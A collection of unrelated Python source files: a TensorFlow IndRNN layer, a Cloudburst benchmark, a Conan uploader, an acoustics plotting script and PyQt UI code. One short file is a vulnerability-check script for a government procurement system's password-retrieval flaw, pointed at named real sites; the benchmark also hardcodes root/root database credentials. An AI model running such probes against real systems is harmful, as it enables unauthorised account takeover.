def layer_norm_indrnn_gradient(op, *grads):
training = op.get_attr('training')
if not training:
raise ValueError(('LayerNormIndRNN can only compute gradients if `training=True` was specified '
'during the forward pass.\nFailed op: {}').format(op.name))
# Extract inputs and outputs from the op.
x = op.inputs[0]
W = op.inputs[1]
u = op.inputs[2]
b = op.inputs[3]
gamma = op.inputs[4]
zoneout_mask = op.inputs[5]
h = op.outputs[0]
cache = op.outputs[1]
# Pre-transpose matrices for better performance.
x = tf.transpose(x, [2, 0, 1])
W = tf.transpose(W, [1, 0])
grads = LIB.haste_layer_norm_indrnn_grad(x, W, u, b, gamma, zoneout_mask, h, cache, grads[0])
return [*grads, None]
def _get_initializer(initializer):
if not isinstance(initializer, dict):
return initializer
if 'uniform' in initializer:
value = initializer['uniform']
return v1.initializers.random_uniform(-value, value)
if 'normal' in initializer:
value = initializer['normal']
return v1.initializers.truncated_normal(stddev=value)
raise ValueError(f'Unknown initializer {initializer}')
class LayerNormIndRNNLayer(tf.Module):
def __init__(self,
num_units,
kernel_initializer=None,
recurrent_initializer=None,
bias_initializer=None,
kernel_transform=None,
recurrent_transform=None,
bias_transform=None,
zoneout=0.0,
dtype=None,
name=None):
super().__init__(name)
self.realname = name
self.num_units = num_units
identity = lambda x: x
self.kernel_config = WeightConfig(v1.initializers.glorot_uniform(), None, identity)
self.recurrent_config = WeightConfig(v1.initializers.random_uniform(-0.5, 0.5), None, identity)
self.bias_config = WeightConfig(v1.initializers.zeros(), None, identity)
self.kernel_config.override(_get_initializer(kernel_initializer), None, kernel_transform)
self.recurrent_config.override(_get_initializer(recurrent_initializer), None, recurrent_transform)
self.bias_config.override(_get_initializer(bias_initializer), None, bias_transform)
self.zoneout = zoneout
self.dtype = dtype or tf.float32
self.kernel = None
self.recurrent_scale = None
self.bias = None
self.gamma = None
self.recurrent_bias = None
self.built = False
def build(self, shape):
if self.built:
return
num_units = self.num_units
input_size = int(shape[-1])
kernel_shape = tf.TensorShape([input_size, num_units])
recurrent_shape = tf.TensorShape([num_units])
bias_shape = tf.TensorShape([num_units])
kernel_weights = self.kernel_config.initializer(kernel_shape, dtype=self.dtype)
recurrent_weights = self.recurrent_config.initializer(recurrent_shape, dtype=self.dtype)
biases = self.bias_config.initializer(bias_shape)
with self.name_scope, v1.variable_scope(self.realname, 'indrnn_cell'):
self.kernel = v1.get_variable('kernel', initializer=kernel_weights)
self.recurrent_scale = v1.get_variable('recurrent_scale', initializer=recurrent_weights)
self.bias = v1.get_variable('bias', initializer=biases)
self.gamma = v1.get_variable('gamma', shape=[2, self.num_units], initializer=v1.initializers.ones())
self.built = True
def get_weights(self):
return {
'kernel': self.kernel_config.transform(self.kernel),
'recurrent_scale': self.recurrent_config.transform(self.recurrent_scale),
'bias': self.bias_config.transform(self.bias),
'gamma': self.gamma,
}
def __call__(self, inputs, sequence_length, training):
self.build(inputs.shape)
shape = tf.shape(inputs)
time_steps = shape[0]
batch_size = shape[1]
# Use an empty zoneout mask if no zoneout is going to be applied.
# Sadly, we can't pass `None` to the op but at least we won't be wasting
# memory or bandwidth on this tensor.
zoneout_mask = tf.zeros([0, 0, 0], dtype=self.dtype)
if self.zoneout:
zoneout_mask = 1.0 - self.zoneout
zoneout_mask += tf.random.uniform([time_steps, batch_size, self.num_units], dtype=self.dtype)
zoneout_mask = tf.floor(zoneout_mask)
weights = self.get_weights()
result, _ = LIB.haste_layer_norm_indrnn(
inputs,
weights['kernel'],
weights['recurrent_scale'],
weights['bias'],
weights['gamma'],
zoneout_mask,
training=training,
zoneout_prob=self.zoneout)
if sequence_length is not None:
# 0-indexed tensors, so length-1.
indices = sequence_length
indices = tf.stack([indices, tf.range(batch_size, dtype=sequence_length.dtype)], axis=-1)
state = tf.gather_nd(result, indices)
else:
state = result[-1]
return result[1:], state
class LayerNormIndRNN(BaseRNN):
"""
Layer Normalized Independently Recurrent Neural Network layer.
This IndRNN layer applies layer normalization to the input activations of a
standard IndRNN. The implementation is fused and GPU-accelerated.
This layer has built-in support for Zoneout regularization.
"""
def __init__(self, num_units, direction='unidirectional', **kwargs):
"""
Initialize the parameters of the IndRNN layer.
Arguments:
num_units: int, the number of units in the IndRNN cell.
direction: string, 'unidirectional' or 'bidirectional'.
**kwargs: Dict, keyword arguments (see below).
Keyword Arguments:
kernel_initializer: (optional) the initializer to use for the input
matrix weights. Defaults to `glorot_uniform`.
recurrent_initializer: (optional) the initializer to use for the
recurrent scale weights. Defaults to uniform random in [-0.5, 0.5].
Note that this initialization scheme is different than in the original
authors' implementation. See https://github.com/lmnt-com/haste/issues/7
for details.
bias_initializer: (optional) the initializer to use for the bias vector.
Defaults to `zeros`.
kernel_transform: (optional) a function with signature
`(kernel: Tensor) -> Tensor` that transforms the kernel before it is
used. Defaults to the identity function.
recurrent_transform: (optional) a function with signature
`(recurrent_scale: Tensor) -> Tensor` that transforms the recurrent
scale vector before it is used. Defaults to the identity function.
bias_transform: (optional) a function with signature
`(bias: Tensor) -> Tensor` that transforms the bias before it is used.
Defaults to the identity function.
zoneout: (optional) float, sets the zoneout rate for Zoneout
regularization. Defaults to 0.
dtype: (optional) the data type for this layer. Defaults to `tf.float32`.
name: (optional) string, the name for this layer.
"""
super().__init__(LayerNormIndRNNLayer, num_units, direction, 'indrnn_cell', **kwargs)
|
StarcoderdataPython
|
11367370
|
# Copyright 2019 U.C. Berkeley RISE Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modifications copyright (C) 2021 <NAME>, <NAME>
import logging
import os
import sys
import time
from datetime import datetime
import cloudpickle as cp
from cloudburst.shared.reference import CloudburstReference
from cloudburst.server.benchmarks.ZipfGenerator import ZipfGenerator
from cloudburst.shared.proto.cloudburst_pb2 import CloudburstError
from cloudburst.server.benchmarks import utils
from cloudburst.shared.serializer import Serializer
from cloudburst.shared.proto.cloudburst_pb2 import (
Continuation,
DagTrigger,
FunctionCall,
NORMAL, MULTI, # Cloudburst's consistency modes,
EXECUTION_ERROR, FUNC_NOT_FOUND, # Cloudburst's error types
MULTIEXEC # Cloudburst's execution types
)
from anna.lattices import WrenLattice
import pymongo
def getTime():
return datetime.now().timestamp() * 1000
def func(cloudburst, futureReads, *argv):
next_read = []
keys = futureReads.pop(0)
for key in keys:
next_read.append(CloudburstReference(key, True))
return (futureReads, *next_read)
def sink(cloudburst, futureReads, *argv):
next_read = []
keys = futureReads.pop(0)
for key in keys:
next_read.append(CloudburstReference(key, True))
return 1
def func_parallel_test(cloudburst, x):
return x*2
def func_parallel_sink(cloudburst, x, y):
return x+y
def run(cloudburst_client, num_requests, create, redis, dag_name, db_size, tx_size, dag_size, zipf, warmup):
myclient = pymongo.MongoClient("mongodb://%s:%[email protected]:27017/" % ('root', 'root'))
mydb = myclient["mydatabase"]
mycol = mydb[dag_name]
if create:
serializer = Serializer()
functions = []
last = ""
connections = []
for i in range(dag_size-1):
functions.append('func' + str(i))
cloudburst_client.register(func, 'func' + str(i))
if (last != ""):
connections.append((last, 'func' + str(i)))
last = 'func' + str(i)
functions.append('write')
cloudburst_client.register(sink, 'write')
if (last != ""):
connections.append((last, 'write'))
time.sleep(20)
flag = True
while flag:
try:
success, error = cloudburst_client.register_dag(dag_name, functions, connections)
flag = False
except:
continue
keys = []
object = serializer.dump_lattice(1, WrenLattice)
for i in range(db_size + 1):
keys.append("k" + str(i))
if i % 1000 == 0:
cloudburst_client.kvs_client.put(keys, [object] * 1000)
keys = []
pass
if len(keys) != 0:
cloudburst_client.kvs_client.put(keys, [object] * len(keys))
mycol.insert({"operation": "create", "dag_name": dag_name, "result" : success, "error":error, "db_size": db_size, "tx_size": tx_size, "dag_size": dag_size, "zipf" : zipf})
return [], [], [], 0
elif warmup:
logging.info("Warming up")
warmup_keys = 10000
requests = []
tx_size = 100
for i in range(warmup_keys // tx_size):
keys_to_read = []
ref_to_key = []
for j in range(tx_size):
keys_to_read.append(CloudburstReference("k" + str(i * tx_size + j), True))
for k in range(0, dag_size):
next_request = []
for m in range(tx_size):
next_request.append("k" + str((i * tx_size + k * tx_size + m) % warmup_keys))
ref_to_key.append(next_request)
arg_map = {'func0': [ref_to_key, *keys_to_read]}
requests.append(arg_map)
total_time = []
epoch_req_count = 0
epoch_latencies = []
epoch_start = getTime()
epoch = 0
for request in requests:
start = getTime()
flag = True
while flag:
try:
res = cloudburst_client.call_dag(dag_name, request, consistency=MULTI, direct_response=True)
flag = False
except Exception as e:
logging.info(e)
continue
end = getTime()
if res is not None:
epoch_req_count += 1
total_time += [end - start]
epoch_latencies += [end - start]
epoch_end = getTime()
if epoch_end - epoch_start > 10:
if redis:
logging.info("Have redis")
redis.publish("result", cp.dumps((epoch_req_count, epoch_latencies)))
logging.info('EPOCH %d THROUGHPUT: %.2f' %
(epoch, (epoch_req_count / 10)))
out = utils.print_latency_stats(epoch_latencies,
'EPOCH %d E2E' % epoch, True)
epoch += 1
epoch_req_count = 0
epoch_latencies.clear()
epoch_start = getTime()
out = utils.print_latency_stats(total_time, 'E2E', True)
mycol.insert(
{"operation": "finish", "dag_name": dag_name, "result": out, "error": None, "db_size": db_size,
"tx_size": tx_size, "dag_size": dag_size, "zipf": zipf})
return total_time, [], [], 0
else:
logging.info("Generating requests")
logging.info("DB Size: %s zipf: %s" % (db_size, zipf))
logging.info("zipf_" + str(zipf) + "_" + str(db_size) + ".json")
logging.info("Current path: %s" % os.getcwd())
zipfGenerator = ZipfGenerator(db_size, zipf)
logging.info("zipf generator created")
next_read = []
keys = set()
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
for key in keys:
next_read.append(CloudburstReference(key, True))
total_time = []
epoch_req_count = 0
epoch_latencies = []
epoch_start = getTime()
epoch = 0
requests = []
for _ in range(num_requests):
next_read = []
keys = set()
output_key = "k" + str(zipfGenerator.next())
futureReads = []
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
for key in keys:
next_read.append(CloudburstReference(key, True))
for i in range(dag_size):
f_read = []
keys = set()
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
futureReads.append(keys)
arg_map = {'func0': [futureReads, *next_read]}
requests.append(arg_map)
''' RUN DAG '''
total_time = []
epoch_req_count = 0
epoch_latencies = []
logging.info("Starting requests")
epoch_start = getTime()
epoch = 0
for request in requests:
output_key = "k" + str(zipfGenerator.next())
start = getTime()
flag = True
while flag:
try:
res = cloudburst_client.call_dag(dag_name, request, consistency=MULTI, output_key=output_key, direct_response=True)
if (res == "abort"):
continue
flag = False
except Exception as e:
logging.info(e)
continue
end = getTime()
if res is not None:
epoch_req_count += 1
total_time += [end - start]
epoch_latencies += [end - start]
epoch_end = getTime()
if epoch_end - epoch_start > 10:
if redis:
logging.info("Have redis")
redis.publish("result",cp.dumps((epoch_req_count, epoch_latencies)))
logging.info('EPOCH %d THROUGHPUT: %.2f' %
(epoch, (epoch_req_count / 10)))
out = utils.print_latency_stats(epoch_latencies,
'EPOCH %d E2E' % epoch, True)
epoch += 1
epoch_req_count = 0
epoch_latencies.clear()
epoch_start = getTime()
out = utils.print_latency_stats(total_time, 'E2E', True)
mycol.insert(
{"operation": "finish", "dag_name": dag_name, "result": out, "error": None, "db_size": db_size,
"tx_size": tx_size, "dag_size": dag_size, "zipf": zipf})
return total_time, [], [], 0
|
StarcoderdataPython
|
3279684
|
<reponame>csadsl/poc_exp
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:政府采购系统通用型任意用户密码获取漏洞
#Refer:http://www.wooyun.org/bugs/wooyun-2014-076710
def assign(service,arg):
if service=="zfcgxt":
return True,arg
def audit(arg):
url=arg+"UserSecurityController.do?method=getPassword&step=2&userName=admin"
code,head,res,errcode,_=curl.curl2(url)
if code==200 and "usrIsExpired" and "usrIsLocked" in res:
security_hole(url)
if __name__=="__main__":
from dummy import *
audit(assign('zfcgxt','http://www.sxzfcg.gov.cn/')[1])
audit(assign('zfcgxt','http://www.tlzbcg.com/')[1])
|
StarcoderdataPython
|
6509159
|
<reponame>datalogics-kam/conan-package-tools<gh_stars>0
class Uploader(object):
def __init__(self, conan_api, remote_manager, auth_manager, printer):
self.conan_api = conan_api
self.remote_manager = remote_manager
self.auth_manager = auth_manager
self.printer = printer
def upload_packages(self, reference, upload):
remote_name = self.remote_manager.upload_remote_name
if not remote_name:
self.printer.print_message("Upload skipped, not upload remote available")
return
if not self.auth_manager.credentials_ready(remote_name):
self.printer.print_message("Upload skipped, credentials for remote '%s' not available" % remote_name)
return
if upload:
self.printer.print_message("Uploading packages for '%s'" % str(reference))
self.auth_manager.login(remote_name)
self.conan_api.upload(str(reference), all_packages=True, remote=remote_name, force=True)
|
StarcoderdataPython
|
4903645
|
""" Generates Figure 2a of the the paper
<NAME>, <NAME>, and <NAME>. Non-smooth secondary
source distributions in wave
field synthesis. In German Annual Conference
on Acoustics (DAGA), March 2015.
Sound field synthesized by a semi-infintely rectangular array driven by
two-dimensional WFS for a virtual line source.
"""
import numpy as np
import matplotlib.pyplot as plt
import sfs
# simulation parameters
xref = [0, 0, 0] # reference point
normalization = 0.0577 # normalization used for plotting
dx = 0.10 # secondary source distance
N = 1000 # number of secondary sources for one array
Nr = 10 # number of secondary sources on rounded edge
f = 500 # frequency
omega = 2 * np.pi * f # angular frequency
src_angle = 135
grid = sfs.util.xyz_grid([-2.02, 2], [-2, 2.02], 0, spacing=0.02)
def compute_sound_field(x0, n0, a0, omega, angle):
npw = sfs.util.direction_vector(np.radians(angle), np.radians(90))
xs = xref + (np.sqrt(xref[0]**2 + xref[1]**2) + 4) * np.asarray(npw)
d = sfs.mono.drivingfunction.wfs_2d_line(omega, x0, n0, xs)
a = sfs.mono.drivingfunction.source_selection_point(n0, x0, xs)
twin = sfs.tapering.none(a)
p = sfs.mono.synthesized.generic(omega, x0, n0, d * twin * a0, grid,
source=sfs.mono.source.line)
return p, twin, xs
def plot_objects(ax):
sfs.plot.loudspeaker_2d(x0, n0, np.ones(len(x0)), grid=grid)
sfs.plot.virtualsource_2d(xs, type='point', ax=ax)
sfs.plot.reference_2d(xref, ax=ax)
def plot_sound_field(p, xs, twin, diff=0):
fig = plt.figure()
ax1 = fig.add_axes([0.0, 0.0, 0.7, 1])
im = sfs.plot.soundfield(p, grid, xnorm=None, colorbar=False, vmax=1.5,
vmin=-1.5)
plot_objects(plt.gca())
plt.axis([-3.0, 2.2, -2.2, 3.2])
plt.axis('off')
myfig = plt.gcf()
plt.show()
def plot_sound_field_level(p, xs, twin):
fig = plt.figure()
ax1 = fig.add_axes([0.0, 0.0, 0.7, 1])
im = sfs.plot.level(p, grid, xnorm=None, colorbar=False, vmax=3, vmin=-3)
plot_objects(plt.gca())
plt.annotate('4m', (-2.5, 2), (-2.75, -2.4),
arrowprops={'arrowstyle': '<->'})
plt.axis([-3.0, 2.2, -2.2, 3.2])
plt.axis('off')
ax2 = fig.add_axes([0.55, -0.05, 0.25, 1])
plt.axis('off')
cbar = plt.colorbar(im, ax=ax2, shrink=.7)
cbar.set_label('relative level (dB)', rotation=270, labelpad=10)
myfig = plt.gcf()
plt.show()
# get secondary source positions
x0, n0, a0 = sfs.array.rounded_edge(N, Nr, dx, n0=[0, -1, 0],
center=[-2, 2, 0])
# compute field at the given positions for given virutal source
p, twin, xs = compute_sound_field(x0, n0, a0, omega, src_angle)
# plot synthesized sound field for multiple virtual source position
plot_sound_field(p/normalization, xs, twin)
plot_sound_field_level(p/normalization, xs, twin)
|
StarcoderdataPython
|
5093695
|
# -*- coding: utf-8 -*-
# File generated according to PCondType12.ui
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PCondType12(object):
def setupUi(self, PCondType12):
PCondType12.setObjectName("PCondType12")
PCondType12.resize(965, 672)
self.horizontalLayout = QtWidgets.QHBoxLayout(PCondType12)
self.horizontalLayout.setObjectName("horizontalLayout")
self.img_cond = QtWidgets.QLabel(PCondType12)
self.img_cond.setMinimumSize(QtCore.QSize(0, 0))
self.img_cond.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.img_cond.setText("")
self.img_cond.setPixmap(
QtGui.QPixmap(":/images/images/MachineSetup/WindParam/Cond_1_2.PNG")
)
self.img_cond.setScaledContents(True)
self.img_cond.setObjectName("img_cond")
self.horizontalLayout.addWidget(self.img_cond)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.in_Nwpc1 = QtWidgets.QLabel(PCondType12)
self.in_Nwpc1.setMinimumSize(QtCore.QSize(60, 0))
self.in_Nwpc1.setObjectName("in_Nwpc1")
self.gridLayout.addWidget(self.in_Nwpc1, 0, 0, 1, 1)
self.si_Nwpc1 = QtWidgets.QSpinBox(PCondType12)
self.si_Nwpc1.setMinimumSize(QtCore.QSize(70, 0))
self.si_Nwpc1.setProperty("value", 99)
self.si_Nwpc1.setObjectName("si_Nwpc1")
self.gridLayout.addWidget(self.si_Nwpc1, 0, 1, 1, 1)
self.in_Wwire = QtWidgets.QLabel(PCondType12)
self.in_Wwire.setMinimumSize(QtCore.QSize(40, 0))
self.in_Wwire.setObjectName("in_Wwire")
self.gridLayout.addWidget(self.in_Wwire, 1, 0, 1, 1)
self.lf_Wwire = FloatEdit(PCondType12)
self.lf_Wwire.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wwire.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wwire.setObjectName("lf_Wwire")
self.gridLayout.addWidget(self.lf_Wwire, 1, 1, 1, 1)
self.unit_Wwire = QtWidgets.QLabel(PCondType12)
self.unit_Wwire.setMinimumSize(QtCore.QSize(0, 0))
self.unit_Wwire.setObjectName("unit_Wwire")
self.gridLayout.addWidget(self.unit_Wwire, 1, 2, 1, 1)
self.in_Wins_wire = QtWidgets.QLabel(PCondType12)
self.in_Wins_wire.setMinimumSize(QtCore.QSize(40, 0))
self.in_Wins_wire.setObjectName("in_Wins_wire")
self.gridLayout.addWidget(self.in_Wins_wire, 2, 0, 1, 1)
self.lf_Wins_wire = FloatEdit(PCondType12)
self.lf_Wins_wire.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wins_wire.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wins_wire.setObjectName("lf_Wins_wire")
self.gridLayout.addWidget(self.lf_Wins_wire, 2, 1, 1, 1)
self.unit_Wins_wire = QtWidgets.QLabel(PCondType12)
self.unit_Wins_wire.setMinimumSize(QtCore.QSize(0, 0))
self.unit_Wins_wire.setObjectName("unit_Wins_wire")
self.gridLayout.addWidget(self.unit_Wins_wire, 2, 2, 1, 1)
self.in_Wins_cond = QtWidgets.QLabel(PCondType12)
self.in_Wins_cond.setObjectName("in_Wins_cond")
self.gridLayout.addWidget(self.in_Wins_cond, 3, 0, 1, 1)
self.lf_Wins_cond = FloatEdit(PCondType12)
self.lf_Wins_cond.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wins_cond.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wins_cond.setObjectName("lf_Wins_cond")
self.gridLayout.addWidget(self.lf_Wins_cond, 3, 1, 1, 1)
self.unit_Wins_cond = QtWidgets.QLabel(PCondType12)
self.unit_Wins_cond.setObjectName("unit_Wins_cond")
self.gridLayout.addWidget(self.unit_Wins_cond, 3, 2, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout)
self.w_out = WCondOut(PCondType12)
self.w_out.setObjectName("w_out")
self.verticalLayout_2.addWidget(self.w_out)
spacerItem = QtWidgets.QSpacerItem(
20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
self.verticalLayout_2.addItem(spacerItem)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.retranslateUi(PCondType12)
QtCore.QMetaObject.connectSlotsByName(PCondType12)
PCondType12.setTabOrder(self.si_Nwpc1, self.lf_Wwire)
PCondType12.setTabOrder(self.lf_Wwire, self.lf_Wins_wire)
def retranslateUi(self, PCondType12):
_translate = QtCore.QCoreApplication.translate
PCondType12.setWindowTitle(_translate("PCondType12", "Form"))
self.in_Nwpc1.setText(_translate("PCondType12", "Nwpc1 :"))
self.in_Wwire.setText(_translate("PCondType12", "Wwire :"))
self.unit_Wwire.setText(_translate("PCondType12", "m"))
self.in_Wins_wire.setText(_translate("PCondType12", "Wins_wire :"))
self.unit_Wins_wire.setText(_translate("PCondType12", "m"))
self.in_Wins_cond.setText(_translate("PCondType12", "Wins_cond :"))
self.unit_Wins_cond.setText(_translate("PCondType12", "m"))
from ......GUI.Dialog.DMachineSetup.SWindCond.WCondOut.WCondOut import WCondOut
from ......GUI.Tools.FloatEdit import FloatEdit
from pyleecan.GUI.Resources import pyleecan_rc
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.